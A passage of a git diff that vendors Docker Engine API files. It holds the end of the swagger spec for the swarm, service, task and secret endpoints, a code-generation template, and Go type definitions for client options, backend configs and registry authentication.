`192.168.1.1:4567`, or an interface followed by a port number, like `eth0:4567`. If the port number is omitted, the port number from the listen address is used. If `AdvertiseAddr` is not specified, it will be automatically detected when possible." + type: "string" + RemoteAddrs: + description: "Addresses of manager nodes already participating in the swarm." 
+ type: "string" + JoinToken: + description: "Secret token for joining this swarm." + type: "string" + example: + ListenAddr: "0.0.0.0:2377" + AdvertiseAddr: "192.168.1.1:2377" + RemoteAddrs: + - "node1:2377" + JoinToken: "SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-7p73s1dx5in4tatdymyhg9hu2" + tags: ["Swarm"] + /swarm/leave: + post: + summary: "Leave a swarm" + operationId: "SwarmLeave" + responses: + 200: + description: "no error" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + 503: + description: "node is not part of a swarm" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "force" + description: "Force leave swarm, even if this is the last manager or that it will break the cluster." + in: "query" + type: "boolean" + default: false + tags: ["Swarm"] + /swarm/update: + post: + summary: "Update a swarm" + operationId: "SwarmUpdate" + responses: + 200: + description: "no error" + 400: + description: "bad parameter" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + 503: + description: "node is not part of a swarm" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "body" + in: "body" + required: true + schema: + $ref: "#/definitions/SwarmSpec" + - name: "version" + in: "query" + description: "The version number of the swarm object being updated. This is required to avoid conflicting writes." + type: "integer" + format: "int64" + required: true + - name: "rotateWorkerToken" + in: "query" + description: "Rotate the worker join token." + type: "boolean" + default: false + - name: "rotateManagerToken" + in: "query" + description: "Rotate the manager join token." + type: "boolean" + default: false + - name: "rotateManagerUnlockKey" + in: "query" + description: "Rotate the manager unlock key." 
+ type: "boolean" + default: false + tags: ["Swarm"] + /swarm/unlockkey: + get: + summary: "Get the unlock key" + operationId: "SwarmUnlockkey" + consumes: + - "application/json" + responses: + 200: + description: "no error" + schema: + type: "object" + properties: + UnlockKey: + description: "The swarm's unlock key." + type: "string" + example: + UnlockKey: "SWMKEY-1-7c37Cc8654o6p38HnroywCi19pllOnGtbdZEgtKxZu8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + tags: ["Swarm"] + /swarm/unlock: + post: + summary: "Unlock a locked manager" + operationId: "SwarmUnlock" + consumes: + - "application/json" + produces: + - "application/json" + parameters: + - name: "body" + in: "body" + required: true + schema: + type: "object" + properties: + UnlockKey: + description: "The swarm's unlock key." + type: "string" + example: + UnlockKey: "SWMKEY-1-7c37Cc8654o6p38HnroywCi19pllOnGtbdZEgtKxZu8" + responses: + 200: + description: "no error" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + tags: ["Swarm"] + /services: + get: + summary: "List services" + operationId: "ServiceList" + responses: + 200: + description: "no error" + schema: + type: "array" + items: + $ref: "#/definitions/Service" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "filters" + in: "query" + type: "string" + description: | + A JSON encoded value of the filters (a `map[string][]string`) to process on the services list. Available filters: + + - `id=` + - `name=` + - `label=` + tags: ["Service"] + /services/create: + post: + summary: "Create a service" + operationId: "ServiceCreate" + consumes: + - "application/json" + produces: + - "application/json" + responses: + 201: + description: "no error" + schema: + type: "object" + properties: + ID: + description: "The ID of the created service." 
+ type: "string" + Warning: + description: "Optional warning message" + type: "string" + example: + ID: "ak7w3gjqoa3kuz8xcpnyy0pvl" + Warning: "unable to pin image doesnotexist:latest to digest: image library/doesnotexist:latest not found" + 403: + description: "network is not eligible for services" + schema: + $ref: "#/definitions/ErrorResponse" + 409: + description: "name conflicts with an existing service" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + 503: + description: "server error or node is not part of a swarm" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "body" + in: "body" + required: true + schema: + allOf: + - $ref: "#/definitions/ServiceSpec" + - type: "object" + example: + Name: "web" + TaskTemplate: + ContainerSpec: + Image: "nginx:alpine" + Mounts: + - + ReadOnly: true + Source: "web-data" + Target: "/usr/share/nginx/html" + Type: "volume" + VolumeOptions: + DriverConfig: {} + Labels: + com.example.something: "something-value" + User: "33" + DNSConfig: + Nameservers: ["8.8.8.8"] + Search: ["example.org"] + Options: ["timeout:3"] + LogDriver: + Name: "json-file" + Options: + max-file: "3" + max-size: "10M" + Placement: {} + Resources: + Limits: + MemoryBytes: 104857600 + Reservations: {} + RestartPolicy: + Condition: "on-failure" + Delay: 10000000000 + MaxAttempts: 10 + Mode: + Replicated: + Replicas: 4 + UpdateConfig: + Delay: 30000000000 + Parallelism: 2 + FailureAction: "pause" + EndpointSpec: + Ports: + - + Protocol: "tcp" + PublishedPort: 8080 + TargetPort: 80 + Labels: + foo: "bar" + - name: "X-Registry-Auth" + in: "header" + description: "A base64-encoded auth configuration for pulling from private registries. 
[See the authentication section for details.](#section/Authentication)" + type: "string" + tags: ["Service"] + /services/{id}: + get: + summary: "Inspect a service" + operationId: "ServiceInspect" + responses: + 200: + description: "no error" + schema: + $ref: "#/definitions/Service" + 404: + description: "no such service" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + description: "ID or name of service." + required: true + type: "string" + tags: ["Service"] + delete: + summary: "Delete a service" + operationId: "ServiceDelete" + responses: + 200: + description: "no error" + 404: + description: "no such service" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + description: "ID or name of service." + required: true + type: "string" + tags: ["Service"] + /services/{id}/update: + post: + summary: "Update a service" + operationId: "ServiceUpdate" + consumes: ["application/json"] + produces: ["application/json"] + responses: + 200: + description: "no error" + schema: + $ref: "#/definitions/ImageDeleteResponse" + 404: + description: "no such service" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + description: "ID or name of service." 
+ required: true + type: "string" + - name: "body" + in: "body" + required: true + schema: + allOf: + - $ref: "#/definitions/ServiceSpec" + - type: "object" + example: + Name: "top" + TaskTemplate: + ContainerSpec: + Image: "busybox" + Args: + - "top" + Resources: + Limits: {} + Reservations: {} + RestartPolicy: + Condition: "any" + MaxAttempts: 0 + Placement: {} + ForceUpdate: 0 + Mode: + Replicated: + Replicas: 1 + UpdateConfig: + Parallelism: 1 + Monitor: 15000000000 + MaxFailureRatio: 0.15 + EndpointSpec: + Mode: "vip" + + - name: "version" + in: "query" + description: "The version number of the service object being updated. This is required to avoid conflicting writes." + required: true + type: "integer" + - name: "registryAuthFrom" + in: "query" + type: "string" + description: "If the X-Registry-Auth header is not specified, this + parameter indicates where to find registry authorization credentials. The + valid values are `spec` and `previous-spec`." + default: "spec" + - name: "X-Registry-Auth" + in: "header" + description: "A base64-encoded auth configuration for pulling from private registries. [See the authentication section for details.](#section/Authentication)" + type: "string" + + tags: ["Service"] + /services/{id}/logs: + get: + summary: "Get service logs" + description: | + Get `stdout` and `stderr` logs from a service. + + **Note**: This endpoint works only for services with the `json-file` or `journald` logging drivers. 
+ operationId: "ServiceLogs" + produces: + - "application/vnd.docker.raw-stream" + - "application/json" + responses: + 101: + description: "logs returned as a stream" + schema: + type: "string" + format: "binary" + 200: + description: "logs returned as a string in response body" + schema: + type: "string" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + - name: "details" + in: "query" + description: "Show extra details provided to logs." + type: "boolean" + default: false + - name: "follow" + in: "query" + description: | + Return the logs as a stream. + + This will return a `101` HTTP response with a `Connection: upgrade` header, then hijack the HTTP connection to send raw output. For more information about hijacking and the stream format, [see the documentation for the attach endpoint](#operation/ContainerAttach). + type: "boolean" + default: false + - name: "stdout" + in: "query" + description: "Return logs from `stdout`" + type: "boolean" + default: false + - name: "stderr" + in: "query" + description: "Return logs from `stderr`" + type: "boolean" + default: false + - name: "since" + in: "query" + description: "Only return logs since this time, as a UNIX timestamp" + type: "integer" + default: 0 + - name: "timestamps" + in: "query" + description: "Add timestamps to every log line" + type: "boolean" + default: false + - name: "tail" + in: "query" + description: "Only return this number of log lines from the end of the logs. Specify as an integer or `all` to output all log lines." 
+ type: "string" + default: "all" + tags: ["Service"] + /tasks: + get: + summary: "List tasks" + operationId: "TaskList" + produces: + - "application/json" + responses: + 200: + description: "no error" + schema: + type: "array" + items: + $ref: "#/definitions/Task" + example: + - ID: "0kzzo1i0y4jz6027t0k7aezc7" + Version: + Index: 71 + CreatedAt: "2016-06-07T21:07:31.171892745Z" + UpdatedAt: "2016-06-07T21:07:31.376370513Z" + Spec: + ContainerSpec: + Image: "redis" + Resources: + Limits: {} + Reservations: {} + RestartPolicy: + Condition: "any" + MaxAttempts: 0 + Placement: {} + ServiceID: "9mnpnzenvg8p8tdbtq4wvbkcz" + Slot: 1 + NodeID: "60gvrl6tm78dmak4yl7srz94v" + Status: + Timestamp: "2016-06-07T21:07:31.290032978Z" + State: "running" + Message: "started" + ContainerStatus: + ContainerID: "e5d62702a1b48d01c3e02ca1e0212a250801fa8d67caca0b6f35919ebc12f035" + PID: 677 + DesiredState: "running" + NetworksAttachments: + - Network: + ID: "4qvuz4ko70xaltuqbt8956gd1" + Version: + Index: 18 + CreatedAt: "2016-06-07T20:31:11.912919752Z" + UpdatedAt: "2016-06-07T21:07:29.955277358Z" + Spec: + Name: "ingress" + Labels: + com.docker.swarm.internal: "true" + DriverConfiguration: {} + IPAMOptions: + Driver: {} + Configs: + - Subnet: "10.255.0.0/16" + Gateway: "10.255.0.1" + DriverState: + Name: "overlay" + Options: + com.docker.network.driver.overlay.vxlanid_list: "256" + IPAMOptions: + Driver: + Name: "default" + Configs: + - Subnet: "10.255.0.0/16" + Gateway: "10.255.0.1" + Addresses: + - "10.255.0.10/16" + - ID: "1yljwbmlr8er2waf8orvqpwms" + Version: + Index: 30 + CreatedAt: "2016-06-07T21:07:30.019104782Z" + UpdatedAt: "2016-06-07T21:07:30.231958098Z" + Name: "hopeful_cori" + Spec: + ContainerSpec: + Image: "redis" + Resources: + Limits: {} + Reservations: {} + RestartPolicy: + Condition: "any" + MaxAttempts: 0 + Placement: {} + ServiceID: "9mnpnzenvg8p8tdbtq4wvbkcz" + Slot: 1 + NodeID: "60gvrl6tm78dmak4yl7srz94v" + Status: + Timestamp: "2016-06-07T21:07:30.202183143Z" + 
State: "shutdown" + Message: "shutdown" + ContainerStatus: + ContainerID: "1cf8d63d18e79668b0004a4be4c6ee58cddfad2dae29506d8781581d0688a213" + DesiredState: "shutdown" + NetworksAttachments: + - Network: + ID: "4qvuz4ko70xaltuqbt8956gd1" + Version: + Index: 18 + CreatedAt: "2016-06-07T20:31:11.912919752Z" + UpdatedAt: "2016-06-07T21:07:29.955277358Z" + Spec: + Name: "ingress" + Labels: + com.docker.swarm.internal: "true" + DriverConfiguration: {} + IPAMOptions: + Driver: {} + Configs: + - Subnet: "10.255.0.0/16" + Gateway: "10.255.0.1" + DriverState: + Name: "overlay" + Options: + com.docker.network.driver.overlay.vxlanid_list: "256" + IPAMOptions: + Driver: + Name: "default" + Configs: + - Subnet: "10.255.0.0/16" + Gateway: "10.255.0.1" + Addresses: + - "10.255.0.5/16" + + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "filters" + in: "query" + type: "string" + description: | + A JSON encoded value of the filters (a `map[string][]string`) to process on the tasks list. 
Available filters: + + - `id=` + - `name=` + - `service=` + - `node=` + - `label=key` or `label="key=value"` + - `desired-state=(running | shutdown | accepted)` + tags: ["Task"] + /tasks/{id}: + get: + summary: "Inspect a task" + operationId: "TaskInspect" + produces: + - "application/json" + responses: + 200: + description: "no error" + schema: + $ref: "#/definitions/Task" + 404: + description: "no such task" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + description: "ID of the task" + required: true + type: "string" + tags: ["Task"] + /secrets: + get: + summary: "List secrets" + operationId: "SecretList" + produces: + - "application/json" + responses: + 200: + description: "no error" + schema: + type: "array" + items: + $ref: "#/definitions/Secret" + example: + - ID: "ktnbjxoalbkvbvedmg1urrz8h" + Version: + Index: 11 + CreatedAt: "2016-11-05T01:20:17.327670065Z" + UpdatedAt: "2016-11-05T01:20:17.327670065Z" + Spec: + Name: "app-dev.crt" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "filters" + in: "query" + type: "string" + description: | + A JSON encoded value of the filters (a `map[string][]string`) to process on the secrets list. Available filters: + + - `names=` + tags: ["Secret"] + /secrets/create: + post: + summary: "Create a secret" + operationId: "SecretCreate" + consumes: + - "application/json" + produces: + - "application/json" + responses: + 201: + description: "no error" + schema: + type: "object" + properties: + ID: + description: "The ID of the created secret." 
+ type: "string" + example: + ID: "ktnbjxoalbkvbvedmg1urrz8h" + 406: + description: "server error or node is not part of a swarm" + schema: + $ref: "#/definitions/ErrorResponse" + 409: + description: "name conflicts with an existing object" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "body" + in: "body" + schema: + allOf: + - $ref: "#/definitions/SecretSpec" + - type: "object" + example: + Name: "app-key.crt" + Labels: + foo: "bar" + Data: "VEhJUyBJUyBOT1QgQSBSRUFMIENFUlRJRklDQVRFCg==" + tags: ["Secret"] + /secrets/{id}: + get: + summary: "Inspect a secret" + operationId: "SecretInspect" + produces: + - "application/json" + responses: + 200: + description: "no error" + schema: + $ref: "#/definitions/Secret" + example: + ID: "ktnbjxoalbkvbvedmg1urrz8h" + Version: + Index: 11 + CreatedAt: "2016-11-05T01:20:17.327670065Z" + UpdatedAt: "2016-11-05T01:20:17.327670065Z" + Spec: + Name: "app-dev.crt" + 404: + description: "secret not found" + schema: + $ref: "#/definitions/ErrorResponse" + 406: + description: "node is not part of a swarm" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + type: "string" + description: "ID of the secret" + tags: ["Secret"] + delete: + summary: "Delete a secret" + operationId: "SecretDelete" + produces: + - "application/json" + responses: + 204: + description: "no error" + 404: + description: "secret not found" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + type: "string" + description: "ID of the secret" + tags: ["Secret"] + /secrets/{id}/update: + post: + summary: "Update a Secret" + operationId: "SecretUpdate" + responses: + 200: + 
description: "no error" + 404: + description: "no such secret" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + description: "The ID of the secret" + type: "string" + required: true + - name: "body" + in: "body" + schema: + $ref: "#/definitions/SecretSpec" + description: "The spec of the secret to update. Currently, only the Labels field can be updated. All other fields must remain unchanged from the [SecretInspect endpoint](#operation/SecretInspect) response values." + - name: "version" + in: "query" + description: "The version number of the secret object being updated. This is required to avoid conflicting writes." + type: "integer" + format: "int64" + required: true + tags: ["Secret"] diff --git a/vendor/github.com/docker/docker/api/templates/server/operation.gotmpl b/vendor/github.com/docker/docker/api/templates/server/operation.gotmpl new file mode 100644 index 0000000000..3a3d7527da --- /dev/null +++ b/vendor/github.com/docker/docker/api/templates/server/operation.gotmpl @@ -0,0 +1,26 @@ +package {{ .Package }} + +// ---------------------------------------------------------------------------- +// DO NOT EDIT THIS FILE +// This file was generated by `swagger generate operation` +// +// See hack/swagger-gen.sh +// ---------------------------------------------------------------------------- + +import ( + "net/http" + + context "golang.org/x/net/context" + + {{ range .DefaultImports }}{{ printf "%q" . }} + {{ end }} + {{ range $key, $value := .Imports }}{{ $key }} {{ printf "%q" $value }} + {{ end }} +) + + +{{ range .ExtraSchemas }} +// {{ .Name }} {{ template "docstring" . }} +// swagger:model {{ .Name }} +{{ template "schema" . 
}} +{{ end }} diff --git a/vendor/github.com/docker/docker/api/types/auth.go b/vendor/github.com/docker/docker/api/types/auth.go new file mode 100644 index 0000000000..056af6b842 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/auth.go @@ -0,0 +1,22 @@ +package types + +// AuthConfig contains authorization information for connecting to a Registry +type AuthConfig struct { + Username string `json:"username,omitempty"` + Password string `json:"password,omitempty"` + Auth string `json:"auth,omitempty"` + + // Email is an optional value associated with the username. + // This field is deprecated and will be removed in a later + // version of docker. + Email string `json:"email,omitempty"` + + ServerAddress string `json:"serveraddress,omitempty"` + + // IdentityToken is used to authenticate the user and get + // an access token for the registry. + IdentityToken string `json:"identitytoken,omitempty"` + + // RegistryToken is a bearer token to be sent to a registry + RegistryToken string `json:"registrytoken,omitempty"` +} diff --git a/vendor/github.com/docker/docker/api/types/backend/backend.go b/vendor/github.com/docker/docker/api/types/backend/backend.go new file mode 100644 index 0000000000..abc0bba3fe --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/backend/backend.go @@ -0,0 +1,84 @@ +// Package backend includes types to send information to server backends. +package backend + +import ( + "io" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/streamformatter" +) + +// ContainerAttachConfig holds the streams to use when connecting to a container to view logs. +type ContainerAttachConfig struct { + GetStreams func() (io.ReadCloser, io.Writer, io.Writer, error) + UseStdin bool + UseStdout bool + UseStderr bool + Logs bool + Stream bool + DetachKeys string + + // Used to signify that streams are multiplexed and therefore need a StdWriter to encode stdout/sderr messages accordingly. 
+ // TODO @cpuguy83: This shouldn't be needed. It was only added so that http and websocket endpoints can use the same function, and the websocket function was not using a stdwriter prior to this change... + // HOWEVER, the websocket endpoint is using a single stream and SHOULD be encoded with stdout/stderr as is done for HTTP since it is still just a single stream. + // Since such a change is an API change unrelated to the current changeset we'll keep it as is here and change separately. + MuxStreams bool +} + +// ContainerLogsConfig holds configs for logging operations. Exists +// for users of the backend to to pass it a logging configuration. +type ContainerLogsConfig struct { + types.ContainerLogsOptions + OutStream io.Writer +} + +// ContainerStatsConfig holds information for configuring the runtime +// behavior of a backend.ContainerStats() call. +type ContainerStatsConfig struct { + Stream bool + OutStream io.Writer + Version string +} + +// ExecInspect holds information about a running process started +// with docker exec. +type ExecInspect struct { + ID string + Running bool + ExitCode *int + ProcessConfig *ExecProcessConfig + OpenStdin bool + OpenStderr bool + OpenStdout bool + CanRemove bool + ContainerID string + DetachKeys []byte + Pid int +} + +// ExecProcessConfig holds information about the exec process +// running on the host. +type ExecProcessConfig struct { + Tty bool `json:"tty"` + Entrypoint string `json:"entrypoint"` + Arguments []string `json:"arguments"` + Privileged *bool `json:"privileged,omitempty"` + User string `json:"user,omitempty"` +} + +// ContainerCommitConfig is a wrapper around +// types.ContainerCommitConfig that also +// transports configuration changes for a container. +type ContainerCommitConfig struct { + types.ContainerCommitConfig + Changes []string +} + +// ProgressWriter is an interface +// to transport progress streams. 
+type ProgressWriter struct { + Output io.Writer + StdoutFormatter *streamformatter.StdoutFormatter + StderrFormatter *streamformatter.StderrFormatter + ProgressReaderFunc func(io.ReadCloser) io.ReadCloser +} diff --git a/vendor/github.com/docker/docker/api/types/blkiodev/blkio.go b/vendor/github.com/docker/docker/api/types/blkiodev/blkio.go new file mode 100644 index 0000000000..931ae10ab1 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/blkiodev/blkio.go @@ -0,0 +1,23 @@ +package blkiodev + +import "fmt" + +// WeightDevice is a structure that holds device:weight pair +type WeightDevice struct { + Path string + Weight uint16 +} + +func (w *WeightDevice) String() string { + return fmt.Sprintf("%s:%d", w.Path, w.Weight) +} + +// ThrottleDevice is a structure that holds device:rate_per_second pair +type ThrottleDevice struct { + Path string + Rate uint64 +} + +func (t *ThrottleDevice) String() string { + return fmt.Sprintf("%s:%d", t.Path, t.Rate) +} diff --git a/vendor/github.com/docker/docker/api/types/client.go b/vendor/github.com/docker/docker/api/types/client.go new file mode 100644 index 0000000000..7900d64f0d --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/client.go @@ -0,0 +1,378 @@ +package types + +import ( + "bufio" + "io" + "net" + "os" + + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/filters" + "github.com/docker/go-units" +) + +// CheckpointCreateOptions holds parameters to create a checkpoint from a container +type CheckpointCreateOptions struct { + CheckpointID string + CheckpointDir string + Exit bool +} + +// CheckpointListOptions holds parameters to list checkpoints for a container +type CheckpointListOptions struct { + CheckpointDir string +} + +// CheckpointDeleteOptions holds parameters to delete a checkpoint from a container +type CheckpointDeleteOptions struct { + CheckpointID string + CheckpointDir string +} + +// ContainerAttachOptions holds parameters to attach to a 
container. +type ContainerAttachOptions struct { + Stream bool + Stdin bool + Stdout bool + Stderr bool + DetachKeys string + Logs bool +} + +// ContainerCommitOptions holds parameters to commit changes into a container. +type ContainerCommitOptions struct { + Reference string + Comment string + Author string + Changes []string + Pause bool + Config *container.Config +} + +// ContainerExecInspect holds information returned by exec inspect. +type ContainerExecInspect struct { + ExecID string + ContainerID string + Running bool + ExitCode int + Pid int +} + +// ContainerListOptions holds parameters to list containers with. +type ContainerListOptions struct { + Quiet bool + Size bool + All bool + Latest bool + Since string + Before string + Limit int + Filters filters.Args +} + +// ContainerLogsOptions holds parameters to filter logs with. +type ContainerLogsOptions struct { + ShowStdout bool + ShowStderr bool + Since string + Timestamps bool + Follow bool + Tail string + Details bool +} + +// ContainerRemoveOptions holds parameters to remove containers. +type ContainerRemoveOptions struct { + RemoveVolumes bool + RemoveLinks bool + Force bool +} + +// ContainerStartOptions holds parameters to start containers. +type ContainerStartOptions struct { + CheckpointID string + CheckpointDir string +} + +// CopyToContainerOptions holds information +// about files to copy into a container +type CopyToContainerOptions struct { + AllowOverwriteDirWithFile bool +} + +// EventsOptions holds parameters to filter events with. +type EventsOptions struct { + Since string + Until string + Filters filters.Args +} + +// NetworkListOptions holds parameters to filter the list of networks with. +type NetworkListOptions struct { + Filters filters.Args +} + +// HijackedResponse holds connection information for a hijacked request. +type HijackedResponse struct { + Conn net.Conn + Reader *bufio.Reader +} + +// Close closes the hijacked connection and reader. 
+func (h *HijackedResponse) Close() { + h.Conn.Close() +} + +// CloseWriter is an interface that implements structs +// that close input streams to prevent from writing. +type CloseWriter interface { + CloseWrite() error +} + +// CloseWrite closes a readWriter for writing. +func (h *HijackedResponse) CloseWrite() error { + if conn, ok := h.Conn.(CloseWriter); ok { + return conn.CloseWrite() + } + return nil +} + +// ImageBuildOptions holds the information +// necessary to build images. +type ImageBuildOptions struct { + Tags []string + SuppressOutput bool + RemoteContext string + NoCache bool + Remove bool + ForceRemove bool + PullParent bool + Isolation container.Isolation + CPUSetCPUs string + CPUSetMems string + CPUShares int64 + CPUQuota int64 + CPUPeriod int64 + Memory int64 + MemorySwap int64 + CgroupParent string + NetworkMode string + ShmSize int64 + Dockerfile string + Ulimits []*units.Ulimit + // See the parsing of buildArgs in api/server/router/build/build_routes.go + // for an explaination of why BuildArgs needs to use *string instead of + // just a string + BuildArgs map[string]*string + AuthConfigs map[string]AuthConfig + Context io.Reader + Labels map[string]string + // squash the resulting image's layers to the parent + // preserves the original image and creates a new one from the parent with all + // the changes applied to a single layer + Squash bool + // CacheFrom specifies images that are used for matching cache. Images + // specified here do not need to have a valid parent chain to match cache. + CacheFrom []string + SecurityOpt []string +} + +// ImageBuildResponse holds information +// returned by a server after building +// an image. +type ImageBuildResponse struct { + Body io.ReadCloser + OSType string +} + +// ImageCreateOptions holds information to create images. 
+type ImageCreateOptions struct { + RegistryAuth string // RegistryAuth is the base64 encoded credentials for the registry +} + +// ImageImportSource holds source information for ImageImport +type ImageImportSource struct { + Source io.Reader // Source is the data to send to the server to create this image from (mutually exclusive with SourceName) + SourceName string // SourceName is the name of the image to pull (mutually exclusive with Source) +} + +// ImageImportOptions holds information to import images from the client host. +type ImageImportOptions struct { + Tag string // Tag is the name to tag this image with. This attribute is deprecated. + Message string // Message is the message to tag the image with + Changes []string // Changes are the raw changes to apply to this image +} + +// ImageListOptions holds parameters to filter the list of images with. +type ImageListOptions struct { + All bool + Filters filters.Args +} + +// ImageLoadResponse returns information to the client about a load process. +type ImageLoadResponse struct { + // Body must be closed to avoid a resource leak + Body io.ReadCloser + JSON bool +} + +// ImagePullOptions holds information to pull images. +type ImagePullOptions struct { + All bool + RegistryAuth string // RegistryAuth is the base64 encoded credentials for the registry + PrivilegeFunc RequestPrivilegeFunc +} + +// RequestPrivilegeFunc is a function interface that +// clients can supply to retry operations after +// getting an authorization error. +// This function returns the registry authentication +// header value in base 64 format, or an error +// if the privilege request fails. +type RequestPrivilegeFunc func() (string, error) + +//ImagePushOptions holds information to push images. +type ImagePushOptions ImagePullOptions + +// ImageRemoveOptions holds parameters to remove images. +type ImageRemoveOptions struct { + Force bool + PruneChildren bool +} + +// ImageSearchOptions holds parameters to search images with. 
+type ImageSearchOptions struct { + RegistryAuth string + PrivilegeFunc RequestPrivilegeFunc + Filters filters.Args + Limit int +} + +// ResizeOptions holds parameters to resize a tty. +// It can be used to resize container ttys and +// exec process ttys too. +type ResizeOptions struct { + Height uint + Width uint +} + +// VersionResponse holds version information for the client and the server +type VersionResponse struct { + Client *Version + Server *Version +} + +// ServerOK returns true when the client could connect to the docker server +// and parse the information received. It returns false otherwise. +func (v VersionResponse) ServerOK() bool { + return v.Server != nil +} + +// NodeListOptions holds parameters to list nodes with. +type NodeListOptions struct { + Filters filters.Args +} + +// NodeRemoveOptions holds parameters to remove nodes with. +type NodeRemoveOptions struct { + Force bool +} + +// ServiceCreateOptions contains the options to use when creating a service. +type ServiceCreateOptions struct { + // EncodedRegistryAuth is the encoded registry authorization credentials to + // use when updating the service. + // + // This field follows the format of the X-Registry-Auth header. + EncodedRegistryAuth string +} + +// ServiceCreateResponse contains the information returned to a client +// on the creation of a new service. +type ServiceCreateResponse struct { + // ID is the ID of the created service. + ID string + // Warnings is a set of non-fatal warning messages to pass on to the user. + Warnings []string `json:",omitempty"` +} + +// Values for RegistryAuthFrom in ServiceUpdateOptions +const ( + RegistryAuthFromSpec = "spec" + RegistryAuthFromPreviousSpec = "previous-spec" +) + +// ServiceUpdateOptions contains the options to be used for updating services. +type ServiceUpdateOptions struct { + // EncodedRegistryAuth is the encoded registry authorization credentials to + // use when updating the service. 
+ // + // This field follows the format of the X-Registry-Auth header. + EncodedRegistryAuth string + + // TODO(stevvooe): Consider moving the version parameter of ServiceUpdate + // into this field. While it does open API users up to racy writes, most + // users may not need that level of consistency in practice. + + // RegistryAuthFrom specifies where to find the registry authorization + // credentials if they are not given in EncodedRegistryAuth. Valid + // values are "spec" and "previous-spec". + RegistryAuthFrom string +} + +// ServiceListOptions holds parameters to list services with. +type ServiceListOptions struct { + Filters filters.Args +} + +// TaskListOptions holds parameters to list tasks with. +type TaskListOptions struct { + Filters filters.Args +} + +// PluginRemoveOptions holds parameters to remove plugins. +type PluginRemoveOptions struct { + Force bool +} + +// PluginEnableOptions holds parameters to enable plugins. +type PluginEnableOptions struct { + Timeout int +} + +// PluginDisableOptions holds parameters to disable plugins. +type PluginDisableOptions struct { + Force bool +} + +// PluginInstallOptions holds parameters to install a plugin. +type PluginInstallOptions struct { + Disabled bool + AcceptAllPermissions bool + RegistryAuth string // RegistryAuth is the base64 encoded credentials for the registry + RemoteRef string // RemoteRef is the plugin name on the registry + PrivilegeFunc RequestPrivilegeFunc + AcceptPermissionsFunc func(PluginPrivileges) (bool, error) + Args []string +} + +// SecretRequestOption is a type for requesting secrets +type SecretRequestOption struct { + Source string + Target string + UID string + GID string + Mode os.FileMode +} + +// SwarmUnlockKeyResponse contains the response for Engine API: +// GET /swarm/unlockkey +type SwarmUnlockKeyResponse struct { + // UnlockKey is the unlock key in ASCII-armored format. + UnlockKey string +} + +// PluginCreateOptions hold all options to plugin create. 
+type PluginCreateOptions struct { + RepoName string +} diff --git a/vendor/github.com/docker/docker/api/types/configs.go b/vendor/github.com/docker/docker/api/types/configs.go new file mode 100644 index 0000000000..20c19f2132 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/configs.go @@ -0,0 +1,69 @@ +package types + +import ( + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/network" +) + +// configs holds structs used for internal communication between the +// frontend (such as an http server) and the backend (such as the +// docker daemon). + +// ContainerCreateConfig is the parameter set to ContainerCreate() +type ContainerCreateConfig struct { + Name string + Config *container.Config + HostConfig *container.HostConfig + NetworkingConfig *network.NetworkingConfig + AdjustCPUShares bool +} + +// ContainerRmConfig holds arguments for the container remove +// operation. This struct is used to tell the backend what operations +// to perform. +type ContainerRmConfig struct { + ForceRemove, RemoveVolume, RemoveLink bool +} + +// ContainerCommitConfig contains build configs for commit operation, +// and is used when making a commit with the current state of the container. +type ContainerCommitConfig struct { + Pause bool + Repo string + Tag string + Author string + Comment string + // merge container config into commit config before commit + MergeConfigs bool + Config *container.Config +} + +// ExecConfig is a small subset of the Config struct that holds the configuration +// for the exec feature of docker. +type ExecConfig struct { + User string // User that will run the command + Privileged bool // Is the container in privileged mode + Tty bool // Attach standard streams to a tty. 
